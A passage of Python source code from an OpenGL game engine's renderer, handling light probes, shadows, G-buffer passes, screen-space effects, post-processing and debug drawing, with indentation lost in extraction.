uniform_data['NEAR_FAR'][...] = (camera.near, camera.far)
uniform_data['JITTER_DELTA'][...] = self.postprocess.jitter_delta
uniform_data['JITTER_OFFSET'][...] = self.postprocess.jitter
self.uniform_view_buffer.bind_uniform_block(data=uniform_data)
uniform_data = self.uniform_light_data
uniform_data['SHADOW_MATRIX'][...] = main_light.shadow_view_projection
uniform_data['SHADOW_EXP'] = main_light.shadow_exp
uniform_data['SHADOW_BIAS'] = main_light.shadow_bias
uniform_data['SHADOW_SAMPLES'] = main_light.shadow_samples
uniform_data['LIGHT_POSITION'][...] = main_light.transform.get_pos()
uniform_data['LIGHT_DIRECTION'][...] = main_light.transform.front
uniform_data['LIGHT_COLOR'][...] = main_light.light_color[:3]
self.uniform_light_buffer.bind_uniform_block(data=uniform_data)
self.uniform_point_light_buffer.bind_uniform_block(data=self.uniform_point_light_data)
def render_light_probe(self, light_probe):
if light_probe.isRendered:
return
logger.info("Rendering Light Probe")
# Set Valid
light_probe.isRendered = True
camera = self.scene_manager.main_camera
old_pos = camera.transform.get_pos().copy()
old_rot = camera.transform.get_rotation().copy()
old_fov = camera.fov
old_aspect = camera.aspect
old_render_font = RenderOption.RENDER_FONT
old_render_skeleton = RenderOption.RENDER_SKELETON_ACTOR
old_render_effect = RenderOption.RENDER_EFFECT
old_render_collision = RenderOption.RENDER_COLLISION
old_render_ssr = self.postprocess.is_render_ssr
old_render_motion_blur = self.postprocess.is_render_motion_blur
old_antialiasing = self.postprocess.anti_aliasing
old_debug_absolute = self.postprocess.debug_absolute
old_debug_mipmap = self.postprocess.debug_mipmap
old_debug_intensity_min = self.postprocess.debug_intensity_min
old_debug_intensity_max = self.postprocess.debug_intensity_max
# set render light probe
RenderOption.RENDER_LIGHT_PROBE = True
RenderOption.RENDER_SKELETON_ACTOR = False
RenderOption.RENDER_EFFECT = False
RenderOption.RENDER_FONT = False
self.postprocess.is_render_motion_blur = False
self.postprocess.anti_aliasing = AntiAliasing.NONE_AA
camera.update_projection(fov=90.0, aspect=1.0)
def render_cube_face(dst_texture, target_face, pos, rotation):
camera.transform.set_pos(pos)
camera.transform.set_rotation(rotation)
camera.update(force_update=True)
# render
self.render_scene()
# copy
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(dst_texture, target_face=target_face)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.mirror_framebuffer(src_framebuffer)
return dst_texture
target_faces = [GL_TEXTURE_CUBE_MAP_POSITIVE_X,
GL_TEXTURE_CUBE_MAP_NEGATIVE_X,
GL_TEXTURE_CUBE_MAP_POSITIVE_Y,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Y,
GL_TEXTURE_CUBE_MAP_POSITIVE_Z,
GL_TEXTURE_CUBE_MAP_NEGATIVE_Z]
pos = light_probe.transform.get_pos()
camera_rotations = [[0.0, math.pi * 1.5, 0.0],
[0.0, math.pi * 0.5, 0.0],
[math.pi * -0.5, math.pi * 1.0, 0.0],
[math.pi * 0.5, math.pi * 1.0, 0.0],
[0.0, math.pi * 1.0, 0.0],
[0.0, 0.0, 0.0]]
# render atmosphere scene to light_probe textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = True
texture_cube = RenderTargets.LIGHT_PROBE_ATMOSPHERE
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# render final scene to temp textures.
RenderOption.RENDER_ONLY_ATMOSPHERE = False
texture_cube = light_probe.texture_probe
for i in range(6):
render_cube_face(texture_cube, target_faces[i], pos, camera_rotations[i])
texture_cube.generate_mipmap()
# convolution
texture_info = light_probe.texture_probe.get_texture_info()
texture_info['name'] = 'temp_cube'
temp_cube = CreateTexture(**texture_info)
mipmap_count = temp_cube.get_mipmap_count()
face_matrixies = [np.array([[0, 0, 1, 0], [0, 1, 0, 0], [-1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[0, 0, -1, 0], [0, 1, 0, 0], [1, 0, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, 1, 0], [0, -1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 0, -1, 0], [0, 1, 0, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]], dtype=np.float32),
np.array([[-1, 0, 0, 0], [0, 1, 0, 0], [0, 0, -1, 0], [0, 0, 0, 1]], dtype=np.float32)]
convolve_environment = self.resource_manager.get_material_instance('convolve_environment')
convolve_environment.use_program()
for i in range(6):
for lod in range(mipmap_count):
self.framebuffer_manager.bind_framebuffer(temp_cube, target_face=target_faces[i], target_level=lod)
glClear(GL_COLOR_BUFFER_BIT)
convolve_environment.bind_uniform_data("texture_environment", texture_cube)
convolve_environment.bind_uniform_data("face_matrix", face_matrixies[i])
convolve_environment.bind_uniform_data("lod", float(lod))
convolve_environment.bind_uniform_data("mipmap_count", float(mipmap_count))
self.postprocess.draw_elements()
light_probe.replace_texture_probe(temp_cube)
self.rendertarget_manager.get_temporary('temp_cube', light_probe.texture_probe)
RenderOption.RENDER_LIGHT_PROBE = False
RenderOption.RENDER_SKELETON_ACTOR = old_render_skeleton
RenderOption.RENDER_EFFECT = old_render_effect
RenderOption.RENDER_FONT = old_render_font
RenderOption.RENDER_COLLISION = old_render_collision
self.postprocess.is_render_ssr = old_render_ssr
self.postprocess.is_render_motion_blur = old_render_motion_blur
self.postprocess.anti_aliasing = old_antialiasing
self.postprocess.debug_absolute = old_debug_absolute
self.postprocess.debug_mipmap = old_debug_mipmap
self.postprocess.debug_intensity_min = old_debug_intensity_min
self.postprocess.debug_intensity_max = old_debug_intensity_max
camera.update_projection(old_fov, old_aspect)
camera.transform.set_pos(old_pos)
camera.transform.set_rotation(old_rot)
camera.update(force_update=True)
def render_gbuffer(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
# render terrain
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.GBUFFER)
# render static actor
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.static_solid_render_infos)
# render velocity
self.framebuffer_manager.bind_framebuffer(RenderTargets.VELOCITY)
glClear(GL_COLOR_BUFFER_BIT)
if RenderOption.RENDER_STATIC_ACTOR:
self.postprocess.render_velocity(RenderTargets.DEPTH)
# render skeletal actor gbuffer
if RenderOption.RENDER_SKELETON_ACTOR:
self.framebuffer_manager.bind_framebuffer(RenderTargets.DIFFUSE,
RenderTargets.MATERIAL,
RenderTargets.WORLD_NORMAL,
RenderTargets.VELOCITY,
depth_texture=RenderTargets.DEPTH)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.GBUFFER,
self.scene_manager.skeleton_solid_render_infos)
def render_shadow(self):
light = self.scene_manager.main_light
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = light.shadow_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# static shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.STATIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if self.scene_manager.terrain.is_render_terrain:
self.scene_manager.terrain.render_terrain(RenderMode.SHADOW)
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR, RenderMode.SHADOW, self.scene_manager.static_shadow_render_infos, self.shadowmap_material)
# dyanmic shadow
self.framebuffer_manager.bind_framebuffer(depth_texture=RenderTargets.DYNAMIC_SHADOWMAP)
glClear(GL_DEPTH_BUFFER_BIT)
glFrontFace(GL_CCW)
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR, RenderMode.SHADOW, self.scene_manager.skeleton_shadow_render_infos, self.shadowmap_skeletal_material)
# composite shadow maps
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
glDisable(GL_CULL_FACE)
self.postprocess.render_composite_shadowmap(RenderTargets.STATIC_SHADOWMAP, RenderTargets.DYNAMIC_SHADOWMAP)
def render_preprocess(self):
# Linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# Screen Space Reflection
if self.postprocess.is_render_ssr:
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection(RenderTargets.HDR,
RenderTargets.WORLD_NORMAL,
RenderTargets.MATERIAL,
RenderTargets.VELOCITY,
RenderTargets.LINEAR_DEPTH)
# swap ssr resolve textures
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV = \
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV, RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED
self.framebuffer_manager.bind_framebuffer(RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_screen_space_reflection_resolve(RenderTargets.SCREEN_SPACE_REFLECTION,
RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED_PREV,
RenderTargets.VELOCITY)
# SSAO
if self.postprocess.is_render_ssao:
temp_ssao = self.rendertarget_manager.get_temporary('temp_ssao', RenderTargets.SSAO)
self.framebuffer_manager.bind_framebuffer(RenderTargets.SSAO)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_ssao(texture_size=(RenderTargets.SSAO.width, RenderTargets.SSAO.height),
texture_lod=self.rendertarget_manager.texture_lod_in_ssao,
texture_normal=RenderTargets.WORLD_NORMAL,
texture_linear_depth=RenderTargets.LINEAR_DEPTH)
self.postprocess.render_gaussian_blur(RenderTargets.SSAO, temp_ssao)
def render_solid(self):
if RenderingType.DEFERRED_RENDERING == self.render_option_manager.rendering_type:
self.postprocess.render_deferred_shading(self.scene_manager.get_light_probe_texture(),
self.scene_manager.atmosphere)
elif RenderingType.FORWARD_RENDERING == self.render_option_manager.rendering_type:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_solid_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_solid_render_infos)
def render_translucent(self):
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.static_translucent_render_infos)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.FORWARD_SHADING,
self.scene_manager.skeleton_translucent_render_infos)
for render_custom_translucent_callback in self.render_custom_translucent_callbacks:
render_custom_translucent_callback()
self.render_custom_translucent_callbacks.clear()
def render_effect(self):
self.scene_manager.effect_manager.render()
def render_actors(self, render_group, render_mode, render_infos, scene_material_instance=None):
if len(render_infos) < 1:
return
last_actor = None
last_actor_material = None
last_actor_material_instance = None
if scene_material_instance is not None:
scene_material_instance.use_program()
scene_material_instance.bind_material_instance()
# render
for render_info in render_infos:
actor = render_info.actor
geometry = render_info.geometry
actor_material = render_info.material
actor_material_instance = render_info.material_instance
is_instancing = actor.is_instancing()
if RenderMode.GBUFFER == render_mode or RenderMode.FORWARD_SHADING == render_mode:
if last_actor_material != actor_material and actor_material is not None:
actor_material.use_program()
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
actor_material_instance.bind_material_instance()
actor_material_instance.bind_uniform_data('is_render_gbuffer', RenderMode.GBUFFER == render_mode)
if RenderMode.FORWARD_SHADING == render_mode:
actor_material_instance.bind_uniform_data('texture_probe', self.scene_manager.get_light_probe_texture())
actor_material_instance.bind_uniform_data('texture_shadow', RenderTargets.COMPOSITE_SHADOWMAP)
actor_material_instance.bind_uniform_data('texture_ssao', RenderTargets.SSAO)
actor_material_instance.bind_uniform_data('texture_scene_reflect', RenderTargets.SCREEN_SPACE_REFLECTION_RESOLVED)
# Bind Atmosphere
self.scene_manager.atmosphere.bind_precomputed_atmosphere(actor_material_instance)
elif RenderMode.SHADOW == render_mode:
if last_actor_material_instance != actor_material_instance and actor_material_instance is not None:
# get diffuse texture from actor material instance
data_diffuse = actor_material_instance.get_uniform_data('texture_diffuse')
scene_material_instance.bind_uniform_data('texture_diffuse', data_diffuse)
if last_actor != actor:
material_instance = scene_material_instance or actor_material_instance
if RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', actor.get_object_id())
elif RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', actor.get_object_color())
material_instance.bind_uniform_data('is_instancing', is_instancing)
material_instance.bind_uniform_data('model', actor.transform.matrix)
if render_group == RenderGroup.SKELETON_ACTOR:
animation_buffer = actor.get_animation_buffer(geometry.skeleton.index)
prev_animation_buffer = actor.get_prev_animation_buffer(geometry.skeleton.index)
material_instance.bind_uniform_data('bone_matrices', animation_buffer, num=len(animation_buffer))
material_instance.bind_uniform_data('prev_bone_matrices', prev_animation_buffer, num=len(prev_animation_buffer))
# draw
if is_instancing:
geometry.draw_elements_instanced(actor.get_instance_render_count(), self.actor_instance_buffer, [actor.instance_matrix, ])
else:
geometry.draw_elements()
last_actor = actor
last_actor_material = actor_material
last_actor_material_instance = actor_material_instance
def render_selected_object(self):
selected_object = self.scene_manager.get_selected_object()
if selected_object is not None:
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_RGBA8)
glDisable(GL_DEPTH_TEST)
glDepthMask(False)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT)
self.set_blend_state(False)
object_type = type(selected_object)
if SkeletonActor == object_type and RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_skeletal_object_material)
elif StaticActor == object_type and RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.SELECTED_OBJECT,
self.scene_manager.selected_object_render_info,
self.selcted_static_object_material)
elif Spline3D == object_type:
self.debug_line_manager.bind_render_spline_program()
self.debug_line_manager.render_spline(selected_object, Float4(1.0, 1.0, 1.0, 1.0))
else:
return
# composite
self.set_blend_state(True, GL_FUNC_ADD, GL_SRC_ALPHA, GL_ONE_MINUS_SRC_ALPHA)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.selcted_object_composite_material.use_program()
self.selcted_object_composite_material.bind_uniform_data("texture_mask", RenderTargets.TEMP_RGBA8)
self.postprocess.draw_elements()
def render_axis_gizmo(self, render_mode):
if self.scene_manager.get_selected_object() is not None:
axis_gizmo_actor = self.scene_manager.get_axis_gizmo()
material_instance = None
if RenderMode.GIZMO == render_mode:
material_instance = self.render_color_material
elif RenderMode.OBJECT_ID == render_mode:
material_instance = self.static_object_id_material
material_instance.use_program()
material_instance.bind_uniform_data('is_instancing', False)
material_instance.bind_uniform_data('model', axis_gizmo_actor.transform.matrix)
geometries = axis_gizmo_actor.get_geometries()
for i, geometry in enumerate(geometries):
if RenderMode.GIZMO == render_mode:
material_instance.bind_uniform_data('color', axis_gizmo_actor.get_object_color(i))
elif RenderMode.OBJECT_ID == render_mode:
material_instance.bind_uniform_data('object_id', axis_gizmo_actor.get_object_id(i))
geometry.draw_elements()
def render_object_id(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.OBJECT_ID, depth_texture=RenderTargets.OBJECT_ID_DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.set_blend_state(False)
# render static actor object id
if RenderOption.RENDER_STATIC_ACTOR:
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_solid_render_infos,
self.static_object_id_material)
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.static_translucent_render_infos,
self.static_object_id_material)
# render skeletal actor object id
if RenderOption.RENDER_SKELETON_ACTOR:
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_solid_render_infos,
self.skeletal_object_id_material)
self.render_actors(RenderGroup.SKELETON_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.skeleton_translucent_render_infos,
self.skeletal_object_id_material)
# spline object id
self.debug_line_manager.bind_render_spline_program()
for spline in self.scene_manager.splines:
object_id = spline.get_object_id()
self.debug_line_manager.render_spline(spline, Float4(object_id, object_id, object_id, 1.0), add_width=10.0)
# spline gizmo object id
self.render_actors(RenderGroup.STATIC_ACTOR,
RenderMode.OBJECT_ID,
self.scene_manager.spline_gizmo_render_infos,
self.static_object_id_material)
# gizmo object id
glClear(GL_DEPTH_BUFFER_BIT)
self.render_axis_gizmo(RenderMode.OBJECT_ID)
def render_heightmap(self, actor):
self.framebuffer_manager.bind_framebuffer(RenderTargets.TEMP_HEIGHT_MAP)
self.set_blend_state(blend_enable=True, equation=GL_MAX, func_src=GL_ONE, func_dst=GL_ONE)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glDisable(GL_CULL_FACE)
glDisable(GL_DEPTH_TEST)
glClearColor(0.0, 0.0, 0.0, 1.0)
self.render_heightmap_material.use_program()
self.render_heightmap_material.bind_material_instance()
self.render_heightmap_material.bind_uniform_data('model', actor.transform.matrix)
self.render_heightmap_material.bind_uniform_data('bound_box_min', actor.bound_box.bound_min)
self.render_heightmap_material.bind_uniform_data('bound_box_max', actor.bound_box.bound_max)
actor.get_geometry(0).draw_elements()
if RenderTargets.TEMP_HEIGHT_MAP.enable_mipmap:
self.postprocess.render_generate_max_z(RenderTargets.TEMP_HEIGHT_MAP)
def render_bones(self):
glDisable(GL_DEPTH_TEST)
glDisable(GL_CULL_FACE)
mesh = self.resource_manager.get_mesh("Cube")
static_actors = self.scene_manager.static_actors[:]
if mesh and self.debug_bone_material:
material_instance = self.debug_bone_material
material_instance.use_program()
material_instance.bind()
def draw_bone(mesh, skeleton_mesh, parent_matrix, material_instance, bone, root_matrix, isAnimation):
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
if bone.children:
for child_bone in bone.children:
if isAnimation:
bone_transform = skeleton_mesh.get_animation_transform(bone.name, frame)
child_transform = skeleton_mesh.get_animation_transform(child_bone.name, frame)
else:
bone_transform = np.linalg.inv(bone.inv_bind_matrix)
child_transform = np.linalg.inv(child_bone.inv_bind_matrix)
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
material_instance.bind_uniform_data("mat2", np.dot(child_transform, root_matrix))
mesh.draw_elements()
draw_bone(mesh, skeleton_mesh, bone_transform.copy(), material_instance, child_bone, root_matrix, isAnimation)
else:
material_instance.bind_uniform_data("mat1", np.dot(bone_transform, root_matrix))
child_transform = np.dot(bone_transform, root_matrix)
child_transform[3, :] += child_transform[1, :]
material_instance.bind_uniform_data("mat2", child_transform)
mesh.draw_elements()
for static_actor in static_actors:
if static_actor.model and static_actor.model.mesh and static_actor.model.mesh.skeletons:
skeletons = static_actor.model.mesh.skeletons
skeleton_mesh = static_actor.model.mesh
frame_count = skeleton_mesh.get_animation_frame_count()
frame = math.fmod(self.core_manager.current_time * 30.0, frame_count) if frame_count > 0.0 else 0.0
isAnimation = frame_count > 0.0
for skeleton in skeletons:
matrix = static_actor.transform.matrix
for bone in skeleton.hierachy:
draw_bone(mesh, skeleton_mesh, Matrix4().copy(), material_instance, bone, matrix, isAnimation)
def render_postprocess(self):
# bind frame buffer
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# copy HDR target
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Temporal AA
if AntiAliasing.TAA == self.postprocess.anti_aliasing:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_temporal_antialiasing(RenderTargets.HDR_TEMP,
RenderTargets.TAA_RESOLVE,
RenderTargets.VELOCITY)
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.HDR)
self.framebuffer_manager.bind_framebuffer(RenderTargets.TAA_RESOLVE)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Bloom
if self.postprocess.is_render_bloom:
self.postprocess.render_bloom(RenderTargets.HDR)
# Light Shaft
if self.postprocess.is_render_light_shaft:
self.framebuffer_manager.bind_framebuffer(RenderTargets.LIGHT_SHAFT)
self.postprocess.render_light_shaft(RenderTargets.ATMOSPHERE, RenderTargets.DEPTH)
# Depth Of Field
if self.postprocess.is_render_depth_of_field:
self.postprocess.render_depth_of_field()
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
RenderTargets.HDR.generate_mipmap()
# Tone Map
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_tone_map(RenderTargets.HDR,
RenderTargets.BLOOM_0,
RenderTargets.BLOOM_1,
RenderTargets.BLOOM_2,
RenderTargets.BLOOM_3,
RenderTargets.BLOOM_4,
RenderTargets.LIGHT_SHAFT)
# MSAA Test
if AntiAliasing.MSAA == self.postprocess.anti_aliasing:
src_framebuffer = self.framebuffer_manager.get_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
# resolve MSAA
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
# Motion Blur
if self.postprocess.is_render_motion_blur:
backbuffer_copy = self.rendertarget_manager.get_temporary('backbuffer_copy', RenderTargets.BACKBUFFER)
self.framebuffer_manager.bind_framebuffer(backbuffer_copy)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_motion_blur(RenderTargets.VELOCITY, RenderTargets.BACKBUFFER)
# copy to backbuffer
src_framebuffer = self.framebuffer_manager.get_framebuffer(backbuffer_copy)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.copy_framebuffer(src_framebuffer)
def render_log(self):
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
self.font_manager.render_log(self.viewport.width, self.viewport.height)
def render_text(self, text_render_data, offset_x, offset_y, canvas_width, canvas_height):
if 0 < text_render_data.render_count:
self.font_shader.use_program()
self.font_shader.bind_material_instance()
self.font_shader.bind_uniform_data("texture_font", text_render_data.font_data.texture)
self.font_shader.bind_uniform_data("font_size", text_render_data.font_size)
self.font_shader.bind_uniform_data("offset", (offset_x, offset_y))
self.font_shader.bind_uniform_data("inv_canvas_size", (1.0 / canvas_width, 1.0 / canvas_height))
self.font_shader.bind_uniform_data("count_of_side", text_render_data.font_data.count_of_side)
self.postprocess.draw_elements_instanced(text_render_data.render_count, self.font_instance_buffer, [text_render_data.render_queue, ])
def render_axis(self):
camera = self.scene_manager.main_camera
line_thickness = 2.0
line_length = 100.0
line_size = Float2(line_length / self.core_manager.game_backend.width, line_length / self.core_manager.game_backend.height)
line_offset = line_size - 1.0
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[2][0:2] * line_size, color=Float4(0.0, 0.0, 1.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[1][0:2] * line_size, color=Float4(0.0, 1.0, 0.0, 1.0), width=line_thickness)
self.debug_line_manager.draw_debug_line_2d(line_offset, line_offset + camera.view_origin[0][0:2] * line_size, color=Float4(1.0, 0.0, 0.0, 1.0), width=line_thickness)
def render_scene(self):
main_camera = self.scene_manager.main_camera
# bind scene constants uniform blocks
self.bind_uniform_blocks()
self.set_blend_state(False)
glHint(GL_PERSPECTIVE_CORRECTION_HINT, GL_NICEST)
glPolygonMode(GL_FRONT_AND_BACK, self.view_mode)
# glEnable(GL_FRAMEBUFFER_SRGB)
glEnable(GL_MULTISAMPLE)
glEnable(GL_TEXTURE_CUBE_MAP_SEAMLESS)
glDepthFunc(GL_LEQUAL)
glEnable(GL_CULL_FACE)
glFrontFace(GL_CCW)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClearDepth(1.0)
if self.postprocess.is_render_shader() and not RenderOption.RENDER_LIGHT_PROBE:
""" debug shader """
self.set_blend_state(False)
self.framebuffer_manager.bind_framebuffer(RenderTargets.BACKBUFFER)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_material_instance()
elif RenderOption.RENDER_ONLY_ATMOSPHERE and RenderOption.RENDER_LIGHT_PROBE:
""" render light probe preprocess """
self.framebuffer_manager.bind_framebuffer(RenderTargets.COMPOSITE_SHADOWMAP)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.WORLD_NORMAL, depth_texture=RenderTargets.DEPTH)
glClearColor(0.0, 1.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
glClearColor(1.0, 1.0, 1.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
glClearColor(0.0, 0.0, 0.0, 1.0)
glClear(GL_COLOR_BUFFER_BIT)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.scene_manager.atmosphere.render_precomputed_atmosphere(RenderTargets.LINEAR_DEPTH,
RenderTargets.COMPOSITE_SHADOWMAP,
RenderOption.RENDER_LIGHT_PROBE)
# done render light probe preprocess
return
else:
""" render normal scene """
self.scene_manager.ocean.simulateFFTWaves()
# render gbuffer & preprocess
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
self.render_gbuffer()
self.render_preprocess()
self.render_shadow()
# render solid
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection_jitter
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection_jitter
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
glFrontFace(GL_CCW)
glDepthMask(False) # cause depth prepass and gbuffer
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glClear(GL_COLOR_BUFFER_BIT)
self.render_solid()
# copy HDR Target
src_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR)
dst_framebuffer = self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR_TEMP)
glClear(GL_COLOR_BUFFER_BIT)
dst_framebuffer.copy_framebuffer(src_framebuffer)
src_framebuffer.bind_framebuffer()
# set common projection matrix
camera = self.scene_manager.main_camera
self.uniform_view_projection_data['VIEW_PROJECTION'][...] = camera.view_projection
self.uniform_view_projection_data['PREV_VIEW_PROJECTION'][...] = camera.prev_view_projection
self.uniform_view_projection_buffer.bind_uniform_block(data=self.uniform_view_projection_data)
# render ocean
if self.scene_manager.ocean.is_render_ocean:
self.framebuffer_manager.bind_framebuffer(RenderTargets.HDR, depth_texture=RenderTargets.DEPTH)
glDisable(GL_CULL_FACE)
glEnable(GL_DEPTH_TEST)
glDepthMask(True)
self.scene_manager.ocean.render_ocean(atmosphere=self.scene_manager.atmosphere,
texture_scene=RenderTargets.HDR_TEMP,
texture_linear_depth=RenderTargets.LINEAR_DEPTH,
texture_probe=RenderTargets.LIGHT_PROBE_ATMOSPHERE,
texture_shadow=RenderTargets.COMPOSITE_SHADOWMAP)
# re copy Linear depth
self.framebuffer_manager.bind_framebuffer(RenderTargets.LINEAR_DEPTH)
self.postprocess.render_linear_depth(RenderTargets.DEPTH, RenderTargets.LINEAR_DEPTH)
# render atmosphere
if self.scene_manager.atmosphere.is_render_atmosphere:
self.framebuffer_manager.bind_framebuffer(RenderTargets.ATMOSPHERE,
